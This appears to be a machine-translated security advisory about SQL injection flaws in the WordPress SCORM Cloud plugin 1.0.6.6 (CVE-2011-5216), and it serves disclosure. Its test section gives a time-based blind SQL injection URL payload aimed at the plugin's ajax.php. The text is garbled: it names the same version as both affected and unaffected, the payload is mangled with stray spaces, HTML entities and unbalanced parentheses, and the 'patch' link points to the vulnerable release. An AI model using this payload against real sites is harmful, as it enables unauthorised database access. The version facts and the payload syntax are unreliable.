Release date: 2011-09-07
Updated on:
Affected Systems:
WordPress SCORM Cloud 1.0.6.6
Unaffected system:
WordPress SCORM Cloud 1.0.6.6
Description:
--------------------------------------------------------------------------------
Bugtraq id: 49484
Cve id: CVE-2011-5216
The WordPress SCORM Cloud plug-in can convert WordPress sites to LMS.
WordPress SCORM Cloud v1.0.6.6 and earlier versions have multiple SQL Injection Vulnerabilities. Successful exploitation of these vulnerabilities allows attackers to control applications, access or modify data, or exploit other vulnerabilities in lower-level databases.
<* Source: Miroslav Stampar
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/wp-content/plugins/scormcloud/ajax.php? Action = addAnonRegGetLaunchUrl & amp; inviteid =-1 'AND 1 = IF (2 & gt; 1, BENCHMARK (5000000, MD5 (CHAR (115,113,108,109, 97,112), 0) -- % 20
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://downloads.wordpress.org/plugin/scormcloud.1.0.6.6.zip